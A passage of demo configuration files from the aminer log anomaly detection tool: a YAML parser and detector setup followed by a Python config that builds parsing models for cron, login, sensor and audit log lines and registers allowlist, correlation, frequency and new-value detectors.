'blank' - id: delimitedDataModelElement type: DelimitedDataModelElement name: 'DelimitedDataModelElement' delimiter: ';' - id: fixedDataModelElement1 type: FixedDataModelElement name: 'FixedDataModelElement' args: ';' - id: se type: SequenceModelElement name: 'se' args: - delimitedDataModelElement - fixedDataModelElement1 - id: fixed1 type: FixedDataModelElement name: 'fixed1' args: 'match ' - id: fixed2 type: FixedDataModelElement name: 'fixed2' args: 'fixed String' - id: wordlist type: FixedWordlistDataModelElement name: 'wordlist' args: - 'data: ' - 'string: ' - id: decimal type: DecimalIntegerValueModelElement name: 'decimal' - id: seq1 type: SequenceModelElement name: 'seq1' args: - fixed1 - wordlist - id: seq2 type: SequenceModelElement name: 'seq2' args: - fixed1 - wordlist - fixed2 - id: first type: FirstMatchModelElement name: 'first' args: - seq1 - seq2 - id: elementValueBranchModelElement type: ElementValueBranchModelElement name: 'ElementValueBranchModelElement' args: - first - 'wordlist' branch_model_dict: - id: 0 model: decimal - id: 1 model: fixed2 - id: hexStringModelElement type: HexStringModelElement name: 'HexStringModelElement' - id: fixedDataModelElement2 type: FixedDataModelElement name: 'FixedDataModelElement' args: 'Gateway IP-Address: ' - id: ipAddressDataModelElement type: IpAddressDataModelElement name: 'IpAddressDataModelElement' - id: se2 type: SequenceModelElement name: 'se2' args: - fixedDataModelElement2 - ipAddressDataModelElement - id: multiLocaleDateTimeModelElement type: MultiLocaleDateTimeModelElement name: 'MultiLocaleDateTimeModelElement' date_formats: - format: - '%b %d %Y' - null - 'en_US.utf8' - id: fixedDataModelElementDrawnNumber type: FixedDataModelElement name: 'FixedDataModelElement' args: '[drawn number]: ' - id: decimalIntegerValueModelElement1 type: DecimalIntegerValueModelElement name: 'DecimalIntegerValueModelElement' - id: sequenceModelElement type: SequenceModelElement name: 'SequenceModelElement' args: - 
fixedDataModelElementDrawnNumber - decimalIntegerValueModelElement1 - id: repeatedElementDataModelElement type: RepeatedElementDataModelElement name: 'RepeatedElementDataModelElement' args: - sequenceModelElement - 1 - id: variableByteDataModelElement type: VariableByteDataModelElement name: 'VariableByteDataModelElement' args: '-@#' - id: whiteSpaceLimitedDataModelElement type: WhiteSpaceLimitedDataModelElement name: 'WhiteSpaceLimitedDataModelElement' - id: fixed type: FixedDataModelElement name: 'fixed' args: ' ' - id: se3 type: SequenceModelElement name: 'se3' args: - whiteSpaceLimitedDataModelElement - fixed - id: base64StringModelElement type: Base64StringModelElement name: 'Base64StringModelElement' - id: fixed3 type: FixedDataModelElement name: 'FixedDataModelElement' args: 'The-searched-element-was-found!' - id: fixedDME type: FixedDataModelElement name: 'fixedDME' args: 'Any:' - id: any type: AnyByteDataModelElement name: 'AnyByteDataModelElement' - id: seq4 type: SequenceModelElement name: 'se4' args: - fixedDME - any - id: firstMatchModelElement type: FirstMatchModelElement name: 'FirstMatchModelElement//optional' args: - fixed3 - seq4 - id: optionalMatchModelElement type: OptionalMatchModelElement name: '/' args: firstMatchModelElement - id: g type: FixedDataModelElement name: 'g' args: 'g' - id: h type: FixedDataModelElement name: 'h' args: 'h' - id: i type: FixedDataModelElement name: 'i' args: 'i' - id: j type: FixedDataModelElement name: 'j' args: 'j' - id: k type: FixedDataModelElement name: 'k' args: 'k' - id: l type: FixedDataModelElement name: 'l' args: 'l' - id: cronAnnouncement type: SequenceModelElement name: 'CronAnnouncement' args: - dtm - fixedSpace - uName - cron - jobNumber - run - cronType - startTime - id: cronExecution type: SequenceModelElement name: 'CronExecution' args: - dtm - emptySpace1 - uName - cron - jobNumber - job - cronType - started - id: dailyCron type: SequenceModelElement name: 'DailyCron' args: - dtm - uNameSpace1 - 
uName - uNameSpace2 - delimitedUser - cron - jobNumber - details - id: diskReport type: SequenceModelElement name: 'DiskReport' args: - space - data - rest - id: loginDetails type: SequenceModelElement name: 'LoginDetails' args: - userLoginDetails - username - status - pastTime - id: randomTime type: SequenceModelElement name: 'RandomTime' args: - spaceRandom - random - id: sensors type: SequenceModelElement name: 'Sensors' args: - cpuTemp - space1 - cpuWorkload - space2 - dtm - id: ipAddresses type: SequenceModelElement name: 'IPAddresses' args: - userIpAddress - username - action - ip - id: type type: FirstMatchModelElement name: 'type' args: - path - syscall - id: ecd type: FirstMatchModelElement name: 'ECD' args: - g - h - i - j - k - l - id: parsingME type: FirstMatchModelElement name: 'ParsingME' args: - dateTimeModelElement - decimalFloatValueModelElement - decimalIntegerValueModelElement - se - elementValueBranchModelElement - hexStringModelElement - se2 - multiLocaleDateTimeModelElement - repeatedElementDataModelElement - variableByteDataModelElement - se3 - base64StringModelElement - optionalMatchModelElement - id: model start: True type: FirstMatchModelElement name: 'model' args: - cronAnnouncement - cronExecution - dailyCron - diskReport - loginDetails - random - randomTime - sensors - ipAddresses - type - ecd - parsingME Input: timestamp_paths: ["/model/DailyCron/DTM"] adjust_timestamps: True Analysis: - type: TimestampsUnsortedDetector id: TimestampsUnsortedDetector - type: PathExistsMatchRule id: path_exists_match_rule1 path: "/model/LoginDetails/PastTime/Time/Minutes" - type: DebugMatchRule id: debug_match_rule debug_mode: True - type: PathExistsMatchRule id: path_exists_match_rule2 path: "/model/LoginDetails" - type: ValueMatchRule id: value_match_rule path: "/model/LoginDetails/Username" value: "root" - type: NegationMatchRule id: negation_match_rule1 sub_rule: "value_match_rule" - type: NegationMatchRule id: negation_match_rule2 sub_rule: 
"path_exists_match_rule2" - type: AndMatchRule id: and_match_rule1 sub_rules: - "path_exists_match_rule1" - "negation_match_rule1" - "debug_match_rule" - type: AndMatchRule id: and_match_rule2 sub_rules: - "negation_match_rule1" - "path_exists_match_rule2" - "debug_match_rule" - type: OrMatchRule id: or_match_rule sub_rules: - "and_match_rule1" - "and_match_rule2" - "negation_match_rule2" - type: AllowlistViolationDetector id: Allowlist allowlist_rules: - "or_match_rule" - type: ParserCount id: ParserCount report_interval: 10 - type: EventTypeDetector id: EventTypeDetector - type: VariableTypeDetector id: VariableTypeDetector event_type_detector: EventTypeDetector silence_output_except_indicator: False output_logline: False ignore_list: - "/model/RandomTime" - type: VariableCorrelationDetector id: VariableCorrelationDetector event_type_detector: EventTypeDetector ignore_list: - "/model/RandomTime" - type: EventCorrelationDetector id: EventCorrelationDetector check_rules_flag: True hypothesis_max_delta_time: 1.0 learn_mode: True - type: EventFrequencyDetector id: EventFrequencyDetector window_size: 0.5 - type: EventSequenceDetector id: EventSequenceDetector id_path_list: - '/model/ParsingME' ignore_list: - '/model/ECD/g' - '/model/ECD/h' - '/model/ECD/i' - '/model/ECD/j' - '/model/ECD/k' - '/model/ECD/l' - '/model/Random' - '/model/RandomTime' - '/model/DailyCron' - type: MatchFilter id: MatchFilter paths: - "/model/Random" value_list: - 1 - 10 - 100 - type: EnhancedNewMatchPathValueComboDetector id: EnhancedNewValueCombo paths: - "/model/DailyCron/UName" - "/model/DailyCron/JobNumber" tuple_transformation_function: "demo" learn_mode: True - type: ModuloTimeMatchRule id: "mt" path: null seconds_modulo: 3 lower_limit: 0 upper_limit: 3 - type: ValueDependentModuloTimeMatchRule id: "vdmt" path: null seconds_modulo: 3 paths: - "/model/ECD/g" - "/model/ECD/h" - "/model/ECD/i" - "/model/ECD/j" - "/model/ECD/k" - "/model/ECD/l" limit_lookup_dict: e: - 0 - 2.95 
default_limit: - 0 - 3 - type: ValueDependentDelegatedMatchRule id: "value_dependent_delegated_match_rule" paths: - "/model/ECD/g" - "/model/ECD/h" - "/model/ECD/i" - "/model/ECD/j" - "/model/ECD/k" - "/model/ECD/l" rule_lookup_dict: (b"g",): "mt" (b"h",): "mt" (b"i",): "mt" (b"j",): "vdmt" (b"k",): "vdmt" (b"l",): "vdmt" None: "mt" default_rule: "mt" - type: EventGenerationMatchAction id: "ip_match_action" event_type: "Analysis.Rules.IPv4InRFC1918MatchRule" event_message: "Private IP address occurred!" - type: IPv4InRFC1918MatchRule id: "ipv4_in_rfc1918_match_rule" path: "/model/ParsingME/se2/IpAddressDataModelElement" match_action: "ip_match_action" - type: DebugHistoryMatchRule id: "debug_history_match_rule" debug_mode: True - type: ValueListMatchRule id: "value_list_match_rule" path: "/model/ParsingME/se2/IpAddressDataModelElement" value_list: - 134744072 - 134743044 - type: NegationMatchRule id: "negation_list" sub_rule: "value_list_match_rule" - type: ValueRangeMatchRule id: "value_range_match_rule" path: "/model/ParsingME/se2/IpAddressDataModelElement" lower_limit: 167772160 upper_limit: 184549375 - type: NegationMatchRule id: "negation_range" sub_rule: "value_range_match_rule" - type: StringRegexMatchRule id: "string_regex_match_rule" path: "/model/type/syscall/success" regex: "^no$" - type: NegationMatchRule id: "negation_string_regex" sub_rule: "string_regex_match_rule" - type: ParallelMatchRule id: "parallel_match_rule" sub_rules: - "value_dependent_delegated_match_rule" - "ipv4_in_rfc1918_match_rule" - "debug_history_match_rule" - type: AndMatchRule id: "time_and_match_rule" sub_rules: - "parallel_match_rule" - "negation_list" - "negation_range" - "negation_string_regex" - type: AllowlistViolationDetector id: TimeAllowlist allowlist_rules: - "time_and_match_rule" - type: LinearNumericBinDefinition id: linear_numeric_bin_definition lower_limit: 50 bin_size: 5 bin_count: 20 outlier_bins_flag: True - type: ModuloTimeBinDefinition id: 
modulo_time_bin_definition modulo_value: 86400 time_unit: 3600 lower_limit: 0 bin_size: 1 bin_count: 24 outlier_bins_flag: True - type: HistogramAnalysis id: HistogramAnalysis histogram_defs: [["/model/RandomTime/Random", "linear_numeric_bin_definition"]] report_interval: 10 - type: PathDependentHistogramAnalysis id: PathDependentHistogramAnalysis path: "/model/RandomTime" bin_definition: "modulo_time_bin_definition" report_interval: 10 - type: MatchValueAverageChangeDetector id: MatchValueAverageChange timestamp_path: null paths: - "/model/Random" min_bin_elements: 100 min_bin_time: 10 - type: MatchValueStreamWriter id: MatchValueStreamWriter stream: "sys.stdout" paths: - "/model/Sensors/CPUTemp" - "/model/Sensors/CPUWorkload" - "/model/Sensors/DTM" separator: ";" missing_value_string: "" - type: NewMatchPathValueComboDetector id: NewMatchPathValueCombo paths: - "/model/IPAddresses/Username" - "/model/IPAddresses/IP" learn_mode: True - type: NewMatchIdValueComboDetector id: NewMatchIdValueComboDetector paths: - "/model/type/path/name" - "/model/type/syscall/syscall" id_path_list: - "/model/type/path/id" - "/model/type/syscall/id" min_allowed_time_diff: 5 allow_missing_values: True learn_mode: True - type: NewMatchPathValueDetector id: NewMatchPathValue paths: - "/model/DailyCron/JobNumber" - "/model/IPAddresses/Username" learn_mode: True - type: MissingMatchPathValueDetector id: MissingMatch paths: - "/model/DiskReport/Space" check_interval: 2 realert_interval: 5 learn_mode: True - type: TimeCorrelationDetector id: TimeCorrelationDetector parallel_check_count: 2 min_rule_attributes: 1 max_rule_attributes: 5 record_count_before_event: 10000 - type: CorrelationRule rule_id: correlation_rule min_time_delta: 5 max_time_delta: 6 artefact_match_parameters: [["/model/CronAnnouncement/JobNumber", "/model/CronExecution/JobNumber"]] - type: EventClassSelector action_id: a_class_selector artefact_a_rules: - correlation_rule - type: EventClassSelector action_id: 
b_class_selector artefact_b_rules: - correlation_rule - type: PathExistsMatchRule id: path_exists_match_rule3 path: "/model/CronAnnouncement/Run" match_action: a_class_selector - type: PathExistsMatchRule id: path_exists_match_rule4 path: "/model/CronExecution/Job" match_action: b_class_selector - type: TimeCorrelationViolationDetector id: TimeCorrelationViolationDetector ruleset: - path_exists_match_rule3 - path_exists_match_rule4 EventHandlers: - id: stpe type: StreamPrinterEventHandler logdata-anomaly-miner-2.6.1/aecid-testsuite/demo/aminer/jsonConverterHandler-demo-config.py000066400000000000000000000747721437606560100321230ustar00rootroot00000000000000from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.DecimalFloatValueModelElement import DecimalFloatValueModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement, MultiLocaleDateTimeModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.Base64StringModelElement import Base64StringModelElement from aminer.parsing.ElementValueBranchModelElement import ElementValueBranchModelElement from aminer.parsing.HexStringModelElement import HexStringModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.RepeatedElementDataModelElement import RepeatedElementDataModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement from 
aminer.parsing.WhiteSpaceLimitedDataModelElement import WhiteSpaceLimitedDataModelElement # This is a template for the "aminer" logfile miner tool. Copy # it to "config.py" and define your ruleset. config_properties = {} # skipcq: PY-W0072 # Define the list of log resources to read from: the resources # named here do not need to exist when aminer is started. This # will just result in a warning. However, if they exist, they have # to be readable by the aminer process! Supported types are: # * file://[path]: Read data from file, reopen it after rollover # * unix://[path]: Open the path as UNIX local socket for reading config_properties['LogResourceList'] = ['file:///tmp/syslog'] # Define the uid/gid of the process that runs the calculation # after opening the log files: config_properties['AminerUser'] = 'aminer' config_properties['AminerGroup'] = 'aminer' # Define the path where aminer will listen for incoming remote # control connections. When missing, no remote control socket # will be created. # config_properties['RemoteControlSocket'] = '/var/run/aminer-remote.socket' # Read the analysis configuration from this file. That part of the configuration # is separated from the main configuration so that it can be loaded # only within the analysis child. Non-absolute path names are # interpreted relative to the main configuration file (this # file). When empty, this configuration has to contain the configuration # for the child also. # config_properties['AnalysisConfigFile'] = 'analysis.py' # Read and store information to be used between multiple invocations # of aminer in this directory. The directory must only be accessible # to the 'AminerUser' but not group/world readable. On violation, # aminer will refuse to start. When undefined, '/var/lib/aminer' # is used. config_properties['Core.PersistenceDir'] = '/tmp/lib/aminer' # skipcq: BAN-B108 # Define a target e-mail address to send alerts to. When undefined, # no e-mail notification hooks are added. 
config_properties['MailAlerting.TargetAddress'] = 'root@localhost' # Sender address of e-mail alerts. When undefined, "sendmail" # implementation on host will decide, which sender address should # be used. config_properties['MailAlerting.FromAddress'] = 'root@localhost' # Define, which text should be prepended to the standard aminer # subject. Defaults to "aminer Alerts:" config_properties['MailAlerting.SubjectPrefix'] = 'aminer Alerts:' # Define a grace time after startup before aminer will react to # an event and send the first alert e-mail. Defaults to 0 (any # event can immediately trigger alerting). config_properties['MailAlerting.AlertGraceTime'] = 0 # Define how many seconds to wait after a first event triggered # the alerting procedure before really sending out the e-mail. # In that timespan, events are collected and will be sent all # using a single e-mail. Defaults to 10 seconds. config_properties['MailAlerting.EventCollectTime'] = 0 # Define the minimum time between two alert e-mails in seconds # to avoid spamming. All events during this timespan are collected # and sent out with the next report. Defaults to 600 seconds. config_properties['MailAlerting.MinAlertGap'] = 0 # Define the maximum time between two alert e-mails in seconds. # When undefined this defaults to "MailAlerting.MinAlertGap". # Otherwise this will activate an exponential backoff to reduce # messages during permanent error states by increasing the alert # gap by 50% when more alert-worthy events were recorded while # the previous gap time was not yet elapsed. config_properties['MailAlerting.MaxAlertGap'] = 600 # Define how many events should be included in one alert mail # at most. This defaults to 1000 config_properties['MailAlerting.MaxEventsPerMessage'] = 1000 config_properties['LogPrefix'] = 'Original log line: ' # Add your ruleset here: def build_analysis_pipeline(analysis_context): """ Define the function to create pipeline for parsing the log data. 
It has also to define an AtomizerFactory to instruct aminer how to process incoming data streams to create log atoms from them. """ date_format_string = b'%Y-%m-%d %H:%M:%S' cron = b' cron[' # Build the parsing model: service_children_disk_report = [ FixedDataModelElement('Space', b' Current Disk Data is: Filesystem Type Size Used Avail Use%'), DelimitedDataModelElement('Data', b'%'), AnyByteDataModelElement('Rest')] service_children_login_details = [ FixedDataModelElement('User/LoginDetails', b'User '), DelimitedDataModelElement('Username', b' '), FixedWordlistDataModelElement('Status', [b' logged in', b' logged out']), OptionalMatchModelElement('PastTime', SequenceModelElement('Time', [ FixedDataModelElement('Blank', b' '), DecimalIntegerValueModelElement('Minutes'), FixedDataModelElement('Ago', b' minutes ago.')]))] service_children_cron_job = [ DateTimeModelElement('DTM', date_format_string), FixedDataModelElement('UNameSpace1', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('UNameSpace2', b' '), DelimitedDataModelElement('User', b' '), FixedDataModelElement('Cron', cron), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Details', b']: Job `cron.daily` started.')] service_children_random_time = [FixedDataModelElement('Space', b'Random: '), DecimalIntegerValueModelElement('Random')] service_children_sensors = [SequenceModelElement('CPUTemp', [ FixedDataModelElement('FixedTemp', b'CPU Temp: '), DecimalIntegerValueModelElement('Temp'), FixedDataModelElement('Degrees', b'\xc2\xb0C')]), FixedDataModelElement('Space1', b', '), SequenceModelElement('CPUWorkload', [ FixedDataModelElement('FixedWorkload', b'CPU Workload: '), DecimalIntegerValueModelElement('Workload'), FixedDataModelElement('Percent', b'%')]), FixedDataModelElement('Space2', b', '), DateTimeModelElement('DTM', date_format_string)] service_children_user_ip_address = [ FixedDataModelElement('User/UserIPAddress', b'User '), DelimitedDataModelElement('Username', 
b' '), FixedDataModelElement('Action', b' changed IP address to '), IpAddressDataModelElement('IP')] service_children_cron_job_announcement = [ DateTimeModelElement('DTM', date_format_string), FixedDataModelElement('Space', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('Cron', cron), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Run', b']: Will run job `'), FixedWordlistDataModelElement('CronType', [b'cron.daily', b'cron.hourly', b'cron.monthly', b'cron.weekly']), FixedDataModelElement('StartTime', b'\' in 5 min.')] service_children_cron_job_execution = [ DateTimeModelElement('DTM', date_format_string), FixedDataModelElement('Space1', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('Cron', cron), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Job', b']: Job `'), FixedWordlistDataModelElement('CronType', [b'cron.daily', b'cron.hourly', b'cron.monthly', b'cron.weekly']), FixedDataModelElement('Started', b'\' started')] service_children_audit = [SequenceModelElement('path', [ FixedDataModelElement('type', b'type=PATH '), FixedDataModelElement('msg_audit', b'msg=audit('), DelimitedDataModelElement('msg', b':'), FixedDataModelElement('placeholder', b':'), DecimalIntegerValueModelElement('id'), FixedDataModelElement('item_string', b'): item='), DecimalIntegerValueModelElement('item'), FixedDataModelElement('name_string', b' name="'), DelimitedDataModelElement('name', b'"'), FixedDataModelElement('inode_string', b'" inode='), DecimalIntegerValueModelElement('inode'), FixedDataModelElement('dev_string', b' dev='), DelimitedDataModelElement('dev', b' '), FixedDataModelElement('mode_string', b' mode='), DecimalIntegerValueModelElement('mode', value_pad_type=DecimalIntegerValueModelElement.PAD_TYPE_ZERO), FixedDataModelElement('ouid_string', b' ouid='), DecimalIntegerValueModelElement('ouid'), FixedDataModelElement('ogid_string', b' ogid='), DecimalIntegerValueModelElement('ogid'), 
FixedDataModelElement('rdev_string', b' rdev='), DelimitedDataModelElement('rdev', b' '), FixedDataModelElement('nametype_string', b' nametype='), FixedWordlistDataModelElement('nametype', [b'NORMAL', b'ERROR'])]), SequenceModelElement('syscall', [ FixedDataModelElement('type', b'type=SYSCALL '), FixedDataModelElement('msg_audit', b'msg=audit('), DelimitedDataModelElement('msg', b':'), FixedDataModelElement('placeholder', b':'), DecimalIntegerValueModelElement('id'), FixedDataModelElement('arch_string', b'): arch='), DelimitedDataModelElement('arch', b' '), FixedDataModelElement('syscall_string', b' syscall='), DecimalIntegerValueModelElement('syscall'), FixedDataModelElement('success_string', b' success='), FixedWordlistDataModelElement('success', [b'yes', b'no']), FixedDataModelElement('exit_string', b' exit='), DecimalIntegerValueModelElement('exit'), AnyByteDataModelElement('remainding_data')])] service_children_parsing_model_element = [ DateTimeModelElement('DateTimeModelElement', b'Current DateTime: %d.%m.%Y %H:%M:%S'), DecimalFloatValueModelElement('DecimalFloatValueModelElement', value_sign_type='optional'), DecimalIntegerValueModelElement('DecimalIntegerValueModelElement', value_sign_type='optional', value_pad_type='blank'), SequenceModelElement('se', [ DelimitedDataModelElement('DelimitedDataModelElement', b';'), FixedDataModelElement('FixedDataModelElement', b';')])] # ElementValueBranchModelElement fixed_data_me1 = FixedDataModelElement("fixed1", b'match ') fixed_data_me2 = FixedDataModelElement("fixed2", b'fixed String') fixed_wordlist_data_model_element = FixedWordlistDataModelElement("wordlist", [b'data: ', b'string: ']) decimal_integer_value_model_element = DecimalIntegerValueModelElement("decimal") service_children_parsing_model_element.append( ElementValueBranchModelElement('ElementValueBranchModelElement', FirstMatchModelElement("first", [ SequenceModelElement("seq1", [fixed_data_me1, fixed_wordlist_data_model_element]), 
SequenceModelElement("seq2", [fixed_data_me1, fixed_wordlist_data_model_element, fixed_data_me2])]), "wordlist", {0: decimal_integer_value_model_element, 1: fixed_data_me2})) service_children_parsing_model_element.append(HexStringModelElement('HexStringModelElement')) service_children_parsing_model_element.append(SequenceModelElement('se2', [ FixedDataModelElement('FixedDataModelElement', b'Gateway IP-Address: '), IpAddressDataModelElement('IpAddressDataModelElement')])) import locale loc = locale.getlocale() if loc == (None, None): loc = ('en_US', 'utf8') service_children_parsing_model_element.append( MultiLocaleDateTimeModelElement('MultiLocaleDateTimeModelElement', [(b'%b %d %Y', None, '%s.%s' % loc)])) service_children_parsing_model_element.append( RepeatedElementDataModelElement('RepeatedElementDataModelElement', SequenceModelElement('SequenceModelElement', [ FixedDataModelElement('FixedDataModelElement', b'[drawn number]: '), DecimalIntegerValueModelElement('DecimalIntegerValueModelElement')]), 1)) service_children_parsing_model_element.append(VariableByteDataModelElement('VariableByteDataModelElement', b'-@#')) service_children_parsing_model_element.append(SequenceModelElement('se', [ WhiteSpaceLimitedDataModelElement('WhiteSpaceLimitedDataModelElement'), FixedDataModelElement('fixed', b' ')])) # The Base64StringModelElement must be just before the AnyByteDataModelElement to avoid unexpected Matches. service_children_parsing_model_element.append(Base64StringModelElement('Base64StringModelElement')) # The OptionalMatchModelElement must be paired with a FirstMatchModelElement because it accepts all data and thus no data gets # to the AnyByteDataModelElement. The AnyByteDataModelElement must be last, because all bytes are accepted. 
service_children_parsing_model_element.append( OptionalMatchModelElement('/', FirstMatchModelElement('FirstMatchModelElement//optional', [ FixedDataModelElement('FixedDataModelElement', b'The-searched-element-was-found!'), SequenceModelElement('se', [ FixedDataModelElement('FixedDME', b'Any:'), AnyByteDataModelElement('AnyByteDataModelElement')])]))) alphabet = b'ghijkl' service_children_ecd = [] for _, char in enumerate(alphabet): char = bytes([char]) service_children_ecd.append(FixedDataModelElement(char.decode(), char)) parsing_model = FirstMatchModelElement('model', [ SequenceModelElement('CronAnnouncement', service_children_cron_job_announcement), SequenceModelElement('CronExecution', service_children_cron_job_execution), SequenceModelElement('DailyCron', service_children_cron_job), SequenceModelElement('DiskReport', service_children_disk_report), SequenceModelElement('LoginDetails', service_children_login_details), DecimalIntegerValueModelElement('Random'), SequenceModelElement('RandomTime', service_children_random_time), SequenceModelElement('Sensors', service_children_sensors), SequenceModelElement('IPAddresses', service_children_user_ip_address), FirstMatchModelElement('type', service_children_audit), FirstMatchModelElement('ECD', service_children_ecd), FirstMatchModelElement('ParsingME', service_children_parsing_model_element)]) # Some generic imports. from aminer.analysis import AtomFilters # Create all global handler lists here and append the real handlers later on. # Use this filter to distribute all atoms to the analysis handlers. 
atom_filter = AtomFilters.SubhandlerFilter(None) from aminer.analysis.TimestampCorrectionFilters import SimpleMonotonicTimestampAdjust simple_monotonic_timestamp_adjust = SimpleMonotonicTimestampAdjust([atom_filter]) analysis_context.register_component(simple_monotonic_timestamp_adjust, component_name="SimpleMonotonicTimestampAdjust") from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler from aminer.events.JsonConverterHandler import JsonConverterHandler stream_printer_event_handler = StreamPrinterEventHandler(analysis_context) json_converter_handler = JsonConverterHandler([stream_printer_event_handler], analysis_context) anomaly_event_handlers = [json_converter_handler] # Now define the AtomizerFactory using the model. A simple line based one is usually sufficient. from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory analysis_context.atomizer_factory = SimpleByteStreamLineAtomizerFactory(parsing_model, [simple_monotonic_timestamp_adjust], anomaly_event_handlers) # Just report all unparsed atoms to the event handlers. 
# Two unparsed-atom handlers are registered on purpose (this is a demo that
# exercises both). The simple one does not stop dispatch
# (stop_when_handled_flag=False), so every unparsed atom presumably reaches the
# verbose handler as well and is reported twice; the verbose handler stops
# further dispatch (stop_when_handled_flag=True), so unparsed atoms should not
# reach the detectors registered after it.
from aminer.analysis.UnparsedAtomHandlers import SimpleUnparsedAtomHandler, VerboseUnparsedAtomHandler
simple_unparsed_atom_handler = SimpleUnparsedAtomHandler(anomaly_event_handlers)
atom_filter.add_handler(simple_unparsed_atom_handler, stop_when_handled_flag=False)
analysis_context.register_component(simple_unparsed_atom_handler, component_name="SimpleUnparsedHandler")
verbose_unparsed_atom_handler = VerboseUnparsedAtomHandler(anomaly_event_handlers, parsing_model)
atom_filter.add_handler(verbose_unparsed_atom_handler, stop_when_handled_flag=True)
analysis_context.register_component(verbose_unparsed_atom_handler, component_name="VerboseUnparsedHandler")

# Reports atoms whose timestamps go backwards.
from aminer.analysis.TimestampsUnsortedDetector import TimestampsUnsortedDetector
timestamps_unsorted_detector = TimestampsUnsortedDetector(analysis_context.aminer_config, anomaly_event_handlers)
atom_filter.add_handler(timestamps_unsorted_detector)
analysis_context.register_component(timestamps_unsorted_detector, component_name="TimestampsUnsortedDetector")

from aminer.analysis import Rules
from aminer.analysis.AllowlistViolationDetector import AllowlistViolationDetector

# Allowlist for the LoginDetails event type. The AllowlistViolationDetector
# built from this list further down presumably reports every atom that matches
# none of the rules, so read the OR branches as "what is allowed":
#   1. a LoginDetails line carrying .../PastTime/Time/Minutes whose Username is
#      anything but b'root' (an exact bytes comparison);
#   2. a LoginDetails line without the Minutes path, for any user;
#   3. any atom that is not a LoginDetails line at all.
# The only violation left is a root login/logout line that carries the
# "x minutes ago" part.
# NOTE(review): DebugMatchRule(debug_match_result=True) sits inside both AND
# branches; it looks like a debugging pass-through that logs the match result,
# but whether it can ever fail the AND is not visible here - confirm before
# copying this list into a non-demo configuration.
allowlist_rules = [
    Rules.OrMatchRule([
        Rules.AndMatchRule([
            Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes'),
            Rules.NegationMatchRule(Rules.ValueMatchRule('/model/LoginDetails/Username', b'root')),
            Rules.DebugMatchRule(debug_match_result=True)]),
        Rules.AndMatchRule([
            Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes')),
            Rules.PathExistsMatchRule('/model/LoginDetails'),
            Rules.DebugMatchRule(debug_match_result=True)]),
        Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails'))])]
# This rule list should trigger when the line looks like "User root (logged in, logged out) x minutes ago";
# "User root (logged in, logged out)" without the time part and
# "User 'username' (logged in, logged out) x minutes ago" for any non-root user are allowed.
allowlist_violation_detector = AllowlistViolationDetector(analysis_context.aminer_config, allowlist_rules, anomaly_event_handlers, output_logline=True) analysis_context.register_component(allowlist_violation_detector, component_name="Allowlist") atom_filter.add_handler(allowlist_violation_detector) from aminer.analysis.ParserCount import ParserCount parser_count = ParserCount(analysis_context.aminer_config, None, anomaly_event_handlers, 10) analysis_context.register_component(parser_count, component_name="ParserCount") atom_filter.add_handler(parser_count) from aminer.analysis.EventTypeDetector import EventTypeDetector etd = EventTypeDetector(analysis_context.aminer_config, anomaly_event_handlers) analysis_context.register_component(etd, component_name="EventTypeDetector") atom_filter.add_handler(etd) from aminer.analysis.VariableTypeDetector import VariableTypeDetector vtd = VariableTypeDetector(analysis_context.aminer_config, anomaly_event_handlers, etd, silence_output_except_indicator=False, output_logline=False, ignore_list=["/model/RandomTime"]) analysis_context.register_component(vtd, component_name="VariableTypeDetector") atom_filter.add_handler(vtd) from aminer.analysis.VariableCorrelationDetector import VariableCorrelationDetector vtd = VariableCorrelationDetector(analysis_context.aminer_config, anomaly_event_handlers, etd, disc_div_thres=0.5, ignore_list=["/model/RandomTime"]) analysis_context.register_component(vtd, component_name="VariableCorrelationDetector") atom_filter.add_handler(vtd) from aminer.analysis.EventCorrelationDetector import EventCorrelationDetector ecd = EventCorrelationDetector(analysis_context.aminer_config, anomaly_event_handlers, check_rules_flag=True, hypothesis_max_delta_time=1.0) analysis_context.register_component(ecd, component_name="EventCorrelationDetector") atom_filter.add_handler(ecd) from aminer.analysis.EventFrequencyDetector import EventFrequencyDetector efd = EventFrequencyDetector(analysis_context.aminer_config, 
anomaly_event_handlers, window_size=0.1) analysis_context.register_component(efd, component_name="EventFrequencyDetector") atom_filter.add_handler(efd) from aminer.analysis.EventSequenceDetector import EventSequenceDetector esd = EventSequenceDetector(analysis_context.aminer_config, anomaly_event_handlers, ['/model/ParsingME'], ignore_list=[ '/model/ECD/g', '/model/ECD/h', '/model/ECD/i', '/model/ECD/j', '/model/ECD/k', '/model/ECD/l', '/model/Random', '/model/RandomTime', '/model/DailyCron']) analysis_context.register_component(esd, component_name="EventSequenceDetector") atom_filter.add_handler(esd) from aminer.analysis.MatchFilter import MatchFilter match_filter = MatchFilter(analysis_context.aminer_config, ['/model/Random'], anomaly_event_handlers, target_value_list=[ 1, 10, 100], output_logline=True) analysis_context.register_component(match_filter, component_name="MatchFilter") atom_filter.add_handler(match_filter) from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector new_match_path_detector = NewMatchPathDetector(analysis_context.aminer_config, anomaly_event_handlers, learn_mode=True, output_logline=True) analysis_context.register_component(new_match_path_detector, component_name="NewMatchPath") atom_filter.add_handler(new_match_path_detector) def 